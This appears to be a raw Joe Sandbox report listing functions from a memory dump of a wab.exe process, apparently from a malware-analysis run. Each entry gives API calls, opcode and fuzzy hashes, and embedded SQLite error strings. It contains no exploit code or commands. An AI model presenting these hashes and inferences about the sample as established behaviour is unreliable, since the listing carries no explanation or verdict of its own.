                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 1020059152-0
                                                        • Opcode ID: 484b77b5cefeb9e61422993eae9162be30095e87f524e4b5ddd3962d3a09c967
                                                        • Instruction ID: 94413364937b8462cfeb538b3f0f72db04a9f0b57bafb49ce0b7ff0ed55f32c2
                                                        • Opcode Fuzzy Hash: 484b77b5cefeb9e61422993eae9162be30095e87f524e4b5ddd3962d3a09c967
                                                        • Instruction Fuzzy Hash: FF11CA7394061AAFCF121F749824A493B99EF61B71F22442DF85C97241FF35994187E4
                                                        APIs
                                                        • AreFileApisANSI.KERNEL32 ref: 214776F6
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 21477712
                                                        • _malloc.LIBCMT ref: 2147771B
                                                          • Part of subcall function 214D643B: __FF_MSGBANNER.LIBCMT ref: 214D6454
                                                          • Part of subcall function 214D643B: __NMSG_WRITE.LIBCMT ref: 214D645B
                                                          • Part of subcall function 214D643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6480
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 2147773D
                                                        • _free.LIBCMT ref: 21477748
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 2559239037-0
                                                        • Opcode ID: 135a559b76714d6b33ab6c136414ec1c0a8853124bd385df43e76c1f6e762ebd
                                                        • Instruction ID: 7cddecd383bbbbf01fbc23682a8e08cc9c863f6d017ecd91a1a2028ae8cdae4c
                                                        • Opcode Fuzzy Hash: 135a559b76714d6b33ab6c136414ec1c0a8853124bd385df43e76c1f6e762ebd
                                                        • Instruction Fuzzy Hash: DBF0C8B33802143AF6115655AC89FAB7A5CDB81BB5F200225FF2DD72C1D9A5690242A5
                                                        APIs
                                                        • AreFileApisANSI.KERNEL32 ref: 21477686
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 2147769E
                                                        • _malloc.LIBCMT ref: 214776AC
                                                          • Part of subcall function 214D643B: __FF_MSGBANNER.LIBCMT ref: 214D6454
                                                          • Part of subcall function 214D643B: __NMSG_WRITE.LIBCMT ref: 214D645B
                                                          • Part of subcall function 214D643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6480
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 214776CA
                                                        • _free.LIBCMT ref: 214776D5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 2559239037-0
                                                        • Opcode ID: 6d4eea3ff3811097d7edb8f1258d265452b2b37272ade177eec55f0a3180af86
                                                        • Instruction ID: 5b66a3b7a480782a5432bab944b4548dae31e3af7bae9715b9a8af5cbd41d9ab
                                                        • Opcode Fuzzy Hash: 6d4eea3ff3811097d7edb8f1258d265452b2b37272ade177eec55f0a3180af86
                                                        • Instruction Fuzzy Hash: 79F0C8B33451153FE60055A9AC84FEB3B5CEB81675F100335FE1D862C5EA79990682A0
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,2147908D,00000000,00000000,774D2EE0), ref: 21477770
                                                        • _malloc.LIBCMT ref: 2147777C
                                                          • Part of subcall function 214D643B: __FF_MSGBANNER.LIBCMT ref: 214D6454
                                                          • Part of subcall function 214D643B: __NMSG_WRITE.LIBCMT ref: 214D645B
                                                          • Part of subcall function 214D643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6480
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 21477796
                                                        • _free.LIBCMT ref: 214777A1
                                                          • Part of subcall function 214D6401: HeapFree.KERNEL32(00000000,00000000,?,214D8196,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6417
                                                          • Part of subcall function 214D6401: GetLastError.KERNEL32(00000000,?,214D8196,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257,00000000), ref: 214D6429
                                                        • _free.LIBCMT ref: 214777B6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharHeapMultiWide_free$AllocateErrorFreeLast_malloc
                                                        • String ID:
                                                        • API String ID: 70952271-0
                                                        • Opcode ID: 24c3d86f0883df3969cd65ca1122b8b24f72c0df6b7773aad8e8df83b2e8a280
                                                        • Instruction ID: 7e8c41c7c89732fe1ebbafe0bcd5996fb20faf7f4f600a26fb24d736cce9b764
                                                        • Opcode Fuzzy Hash: 24c3d86f0883df3969cd65ca1122b8b24f72c0df6b7773aad8e8df83b2e8a280
                                                        • Instruction Fuzzy Hash: 9CF089B67451233AF72021797C09F9729598F91B71F690335FA18DA2C4FD64A80241F5
                                                        APIs
                                                        • __getptd.LIBCMT ref: 214DA1AA
                                                          • Part of subcall function 214D81A5: __getptd_noexit.LIBCMT ref: 214D81A8
                                                          • Part of subcall function 214D81A5: __amsg_exit.LIBCMT ref: 214D81B5
                                                        • __getptd.LIBCMT ref: 214DA1C1
                                                        • __amsg_exit.LIBCMT ref: 214DA1CF
                                                        • __lock.LIBCMT ref: 214DA1DF
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 214DA1F3
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 38d677b7e5547430ebaf4836f3eaafc362265c1e12cf222e44f6aa3980fe31b8
                                                        • Instruction ID: 917ab224cd3479a3b871c554d18faafc669dbac1864de468b843375f24c5e59d
                                                        • Opcode Fuzzy Hash: 38d677b7e5547430ebaf4836f3eaafc362265c1e12cf222e44f6aa3980fe31b8
                                                        • Instruction Fuzzy Hash: 71F090339457129EEE11AB749825B5D37A06F30F60F21011EE80CA62C5CF345641DB55
                                                        APIs
                                                        • _memset.LIBCMT ref: 214BA8B9
                                                          • Part of subcall function 21491120: _memset.LIBCMT ref: 2149116B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: ($database schema is locked: %s$statement too long
                                                        • API String ID: 2102423945-3861767200
                                                        • Opcode ID: c8210dce59bfaf131b9a8209b661a3a3a6501231e52d6da64d53bb426ebe7ea6
                                                        • Instruction ID: 275f99b6daa2367b50f7ff47fd77ae4d5cdb9f35e49bf14be9af792496ae61d7
                                                        • Opcode Fuzzy Hash: c8210dce59bfaf131b9a8209b661a3a3a6501231e52d6da64d53bb426ebe7ea6
                                                        • Instruction Fuzzy Hash: 22F1C370A043029FD714CF24D880B5ABBF5BF99704F24496EE99D9B342D731EA46CBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: %s: %s$%s: %s.%s$no such table
                                                        • API String ID: 2102423945-1796428332
                                                        • Opcode ID: 2d6879460dff41091746876566fdb72cf049ce9d84306b0d92d1eda6b7383fc2
                                                        • Instruction ID: 22802d529a77b91218b76c5aaa2738b1a83fe51159acc04f8d6be03a8f9a0513
                                                        • Opcode Fuzzy Hash: 2d6879460dff41091746876566fdb72cf049ce9d84306b0d92d1eda6b7383fc2
                                                        • Instruction Fuzzy Hash: A2D14CB4E00206AFEB14CF54D880EAFBBB9EF59B14F10415DE919A7345E730AA41CBA1
                                                        APIs
                                                        Strings
                                                        • unknown column "%s" in foreign key definition, xrefs: 214A9F49
                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 214A9D6A
                                                        • foreign key on %s should reference only one column of table %T, xrefs: 214A9D41
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                        • API String ID: 2102423945-272990098
                                                        • Opcode ID: d53510e95816de6228bd21fbfbf60cbda6ab88c4d15eb91f041d113654321c0c
                                                        • Instruction ID: b600e8162e054d9623f495666525877f4002e6dc402ef76bd204f49d6ea2a658
                                                        • Opcode Fuzzy Hash: d53510e95816de6228bd21fbfbf60cbda6ab88c4d15eb91f041d113654321c0c
                                                        • Instruction Fuzzy Hash: 4CC19775A002469FDB05CF68C4A0AAABBF5FF69314F15819DE94DAB342D331E942CF90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: $ $Recovered %d frames from WAL file %s
                                                        • API String ID: 2102423945-1630138656
                                                        • Opcode ID: 4a94088d4fd2c44914a539a21f03b7ec4963323329e88d5f58bdb9ce64dd7959
                                                        • Instruction ID: 4a74170c0cd7a823a45eb74920cbc406a5364c9b858885695c2f7753786ea57e
                                                        • Opcode Fuzzy Hash: 4a94088d4fd2c44914a539a21f03b7ec4963323329e88d5f58bdb9ce64dd7959
                                                        • Instruction Fuzzy Hash: 9FB1BB71A183018FD704CF68C880A5BBBF5AFD9704F054A6DF9998B352E770EA45CB92
                                                        APIs
                                                        • _memset.LIBCMT ref: 21484F94
                                                          • Part of subcall function 2147D4E0: _memset.LIBCMT ref: 2147D514
                                                        Strings
                                                        • database corruption at line %d of [%.10s], xrefs: 21484E6B
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 21484E61
                                                        • SQLite format 3, xrefs: 21484F6F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: SQLite format 3$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-3910250768
                                                        • Opcode ID: a8d5ef478d6d3d0046edd3f161c7718c0c8833d40dcc80790a4e25c6efbf1b7d
                                                        • Instruction ID: 72568e2e9152a04cbc425f0053432e0e8bfdc6c102cc9b8f38fe419ddf5ce2a4
                                                        • Opcode Fuzzy Hash: a8d5ef478d6d3d0046edd3f161c7718c0c8833d40dcc80790a4e25c6efbf1b7d
                                                        • Instruction Fuzzy Hash: 99B1CFB0A083128FD705CF28D88075ABBE2BF95314F158A5DE99C9B746D371E985CBC2
                                                        APIs
                                                        • _memset.LIBCMT ref: 21486E0D
                                                          • Part of subcall function 2147D4E0: _memset.LIBCMT ref: 2147D514
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$e$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1498164319
                                                        • Opcode ID: 38f359559ff858ae4c8fee5b3284b16df85acbe0d14440aefd2a826a65260356
                                                        • Instruction ID: 84c9cac22de7a9e8fee6bee83365947817327b90858b74c606c7810346a11e0b
                                                        • Opcode Fuzzy Hash: 38f359559ff858ae4c8fee5b3284b16df85acbe0d14440aefd2a826a65260356
                                                        • Instruction Fuzzy Hash: 23810371A043018FC750CF28C880A5AB7E2EF95724F16896DE99D9B381E731E946CBD1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: 8$no such table: %s$too many columns in result set
                                                        • API String ID: 2102423945-577588032
                                                        • Opcode ID: 3aa7018be6da37586dd25402f5a7bb0f229d4eb787474062384c2f2a8782af41
                                                        • Instruction ID: 2c79dc5bf73829970c079a2eb37b906a1d8b3d08c9b62489d1e374e819836cbf
                                                        • Opcode Fuzzy Hash: 3aa7018be6da37586dd25402f5a7bb0f229d4eb787474062384c2f2a8782af41
                                                        • Instruction Fuzzy Hash: 08817E786083828FD301CF25C490B1ABBE1BF96B14F148A5DE99D8B352D375E946CF92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: 8$no such table: %s$too many columns in result set
                                                        • API String ID: 2102423945-577588032
                                                        • Opcode ID: 436c54eaadf461e9e04b8046511f48c11fc6cee017c40ea4724a9810556aa654
                                                        • Instruction ID: c5aafefcec854d40b345f67301bf2b776bfb66f1ccd80b793e454ec1d26a7daf
                                                        • Opcode Fuzzy Hash: 436c54eaadf461e9e04b8046511f48c11fc6cee017c40ea4724a9810556aa654
                                                        • Instruction Fuzzy Hash: 65719E786083829FD301CF24C490B1ABBF1BF9AB14F144A5DE99D8B342D375E946CB82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: __aulldiv__aulldvrm__aullrem
                                                        • String ID: -
                                                        • API String ID: 1415644573-2547889144
                                                        • Opcode ID: fcefee8858fdeb81f1d1e32eb30514bec8de579e9f661022da815ea821cd307a
                                                        • Instruction ID: c3aa3cc270e06acb1a7642324d710bcf08f973e095e8eef435feaf4e059af6ba
                                                        • Opcode Fuzzy Hash: fcefee8858fdeb81f1d1e32eb30514bec8de579e9f661022da815ea821cd307a
                                                        • Instruction Fuzzy Hash: 1461A0B1A087829FD311CB288840BEABFF5AFD6644F48899DE5DC8B352D774C506C792
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: ,N!$0
                                                        • API String ID: 2102423945-2829959512
                                                        • Opcode ID: 104db3b22b883171a9bc5c2978469eb8cd43ff326945f7a11ecdcdec434a04e0
                                                        • Instruction ID: 28c2217bdea9fe36374f18d81181f630c9867cca0a077ee8e69ee59e15ccde2a
                                                        • Opcode Fuzzy Hash: 104db3b22b883171a9bc5c2978469eb8cd43ff326945f7a11ecdcdec434a04e0
                                                        • Instruction Fuzzy Hash: 725160B16043078FE714CF29C4C0A6AB7F5AB95714F14483DE99E87341E774EA06CB92
                                                        Strings
                                                        • virtual tables may not be altered, xrefs: 214A4202
                                                        • Cannot add a column to a view, xrefs: 214A421B
                                                        • sqlite_altertab_%s, xrefs: 214A42A4
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                        • API String ID: 0-2063813899
                                                        • Opcode ID: 791feb2fa05e87310a858fa5fbb174b4f0b909ea38626f4742ca7f15f37c7cb0
                                                        • Instruction ID: 08dd93a5f890c0a41503129284e8e0e22e1dc4828cc58e59df08bd7c22fc6d51
                                                        • Opcode Fuzzy Hash: 791feb2fa05e87310a858fa5fbb174b4f0b909ea38626f4742ca7f15f37c7cb0
                                                        • Instruction Fuzzy Hash: 9D51B2B5A01206AFDB04CF64C890A6EB7F5EFA8310F19856DDC4C9B701E735EA51CB91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: NOCASE$VM!
                                                        • API String ID: 2102423945-3732447004
                                                        • Opcode ID: 280388db9bfaf01275e82be300b35fed75d0b88955f7c95f5d37945a3829b4de
                                                        • Instruction ID: 3cd3181d208e691d4b93520d2682f6442b235c7b3c933ea41cf9b619f19006c9
                                                        • Opcode Fuzzy Hash: 280388db9bfaf01275e82be300b35fed75d0b88955f7c95f5d37945a3829b4de
                                                        • Instruction Fuzzy Hash: B031BCB59002199FD390DF5A99C0D46BFE4BB29324B8241BED90C9F322D331DA51CBC1
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 21477AD0
                                                        • LockFileEx.KERNEL32(?,00000001,00000000,000001FE,00000000,?), ref: 21477B1B
                                                        • LockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 21477BB6
                                                        • GetLastError.KERNEL32 ref: 21477BC2
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: FileLock$ErrorLastVersion
                                                        • String ID:
                                                        • API String ID: 1561719237-0
                                                        • Opcode ID: b67919bf03d196591042e6c27a9479230fc36d28942855fa97ef9f541cb75142
                                                        • Instruction ID: f9d70e917b04558799f57bdf06d6ca69fe188094d77c9d022d5a0c4f4a2c2a24
                                                        • Opcode Fuzzy Hash: b67919bf03d196591042e6c27a9479230fc36d28942855fa97ef9f541cb75142
                                                        • Instruction Fuzzy Hash: F231A371A402188BDB21DF68C849FEA77B4BB09705F0041A9E60DEB282DA749B51CFA5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                        • Instruction ID: d52df676f4ff45c6bf19f2fdd31e3e14809a4eec3cde3dc146751d3b853f63c5
                                                        • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                        • Instruction Fuzzy Hash: A211403340014ABFCF125F94DC62CDE3F66BB1A394B458459FA2C59170D637C6B2AB81
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,21479488), ref: 21477634
                                                        • _malloc.LIBCMT ref: 2147763D
                                                          • Part of subcall function 214D643B: __FF_MSGBANNER.LIBCMT ref: 214D6454
                                                          • Part of subcall function 214D643B: __NMSG_WRITE.LIBCMT ref: 214D645B
                                                          • Part of subcall function 214D643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6480
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 2147765E
                                                        • _free.LIBCMT ref: 21477669
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 2079281532-0
                                                        • Opcode ID: d3c8c7639b4e202e6c4556dd95bbd24e6db16d5a8418a7400eb3080ba053c46b
                                                        • Instruction ID: 026c3525bed4b7fd9935c809997abbc641552fd306e2f6695e03f694bce8a0dc
                                                        • Opcode Fuzzy Hash: d3c8c7639b4e202e6c4556dd95bbd24e6db16d5a8418a7400eb3080ba053c46b
                                                        • Instruction Fuzzy Hash: 8FF065727C523136F671216A3C0AF9769198B92FB1F350235FA2CBE2C5D994690241EE
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,21479086,00000000,00000000,774D2EE0), ref: 214775D0
                                                        • _malloc.LIBCMT ref: 214775DC
                                                          • Part of subcall function 214D643B: __FF_MSGBANNER.LIBCMT ref: 214D6454
                                                          • Part of subcall function 214D643B: __NMSG_WRITE.LIBCMT ref: 214D645B
                                                          • Part of subcall function 214D643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6480
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 214775F9
                                                        • _free.LIBCMT ref: 21477604
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 2079281532-0
                                                        • Opcode ID: f6b13a25ce141d69ffb97f863c2640b67ec41f55a8ba8ebb32f96f0bb0c9e6a8
                                                        • Instruction ID: 67e8a0025e4425b6273cccd6ebb7d7a94ca1c5cf745d54e802ca3c0df019db5d
                                                        • Opcode Fuzzy Hash: f6b13a25ce141d69ffb97f863c2640b67ec41f55a8ba8ebb32f96f0bb0c9e6a8
                                                        • Instruction Fuzzy Hash: B9F0EC7278413136E63131793C09F87255DCF51F71F250331FA289A2C4ED64990241E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,N!$OID
                                                        • API String ID: 0-3498033536
                                                        • Opcode ID: 871de874c72ab9b9d7d60ff19c4a5486d6a0b5f57a9d32853042e5846d4e429a
                                                        • Instruction ID: a154db68fc16bd2bcf37df2e02b817e370b79aa01c95ffaaff91ca9b02adea92
                                                        • Opcode Fuzzy Hash: 871de874c72ab9b9d7d60ff19c4a5486d6a0b5f57a9d32853042e5846d4e429a
                                                        • Instruction Fuzzy Hash: 89D18D786043418FD715CF28C490A6ABBE1BF8AB14F04895CE99E8F352D770E941CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 0-1231421067
                                                        • Opcode ID: 352c66f40e40e48ffee40b15d3828abdc6daee58b3c7118bed801438020d295f
                                                        • Instruction ID: 9a932391cd25d277649985c7a2ed05b3b3b63ba55e62d23b111ec30f80615ca5
                                                        • Opcode Fuzzy Hash: 352c66f40e40e48ffee40b15d3828abdc6daee58b3c7118bed801438020d295f
                                                        • Instruction Fuzzy Hash: 2EA1E0717043028FD720DF28EC80A5AB7E1AF95B64F1A456DEA4C9B351E731ED068BD2
                                                        APIs
                                                        • _memset.LIBCMT ref: 2147D9E7
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2147DB3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                        • String ID: }
                                                        • API String ID: 121741435-4239843852
                                                        • Opcode ID: b5328e169eaa463028e2bc9bd4ccfef383659babad59f0e911694d04efe0e922
                                                        • Instruction ID: 69939f99f9c6b08ee1d9398457928bf3f1b21d27859ce0fc69344f137c34ad9a
                                                        • Opcode Fuzzy Hash: b5328e169eaa463028e2bc9bd4ccfef383659babad59f0e911694d04efe0e922
                                                        • Instruction Fuzzy Hash: 18A14DB5A102069FDB04CF94C4C0AEEBBB5FF98714F20856DD94DAB341D772AA42CB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: %s:%d$rowid
                                                        • API String ID: 2102423945-662108874
                                                        • Opcode ID: fe634726b6a33b55333a31c0efd95e6b7f62e9ebfc9dc9d8822a36144bba7230
                                                        • Instruction ID: 10f860bf65251d5e8c8724dfb366b63356645ab24cfb8c663297094a89c4f3d4
                                                        • Opcode Fuzzy Hash: fe634726b6a33b55333a31c0efd95e6b7f62e9ebfc9dc9d8822a36144bba7230
                                                        • Instruction Fuzzy Hash: 7081C671E0025A9FDB01CF24C8909AEBBB5AF96754F1541D9E95CAB342D6319B03CBB0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: 7e99c38947348f29deb970c8d4f86c0cf47aea4b8a62585419e45528a1df2170
                                                        • Instruction ID: 7afe22a9e0af6759b0d3d42e6dad53d115a33ae0a6990892b7881dd864aa8f85
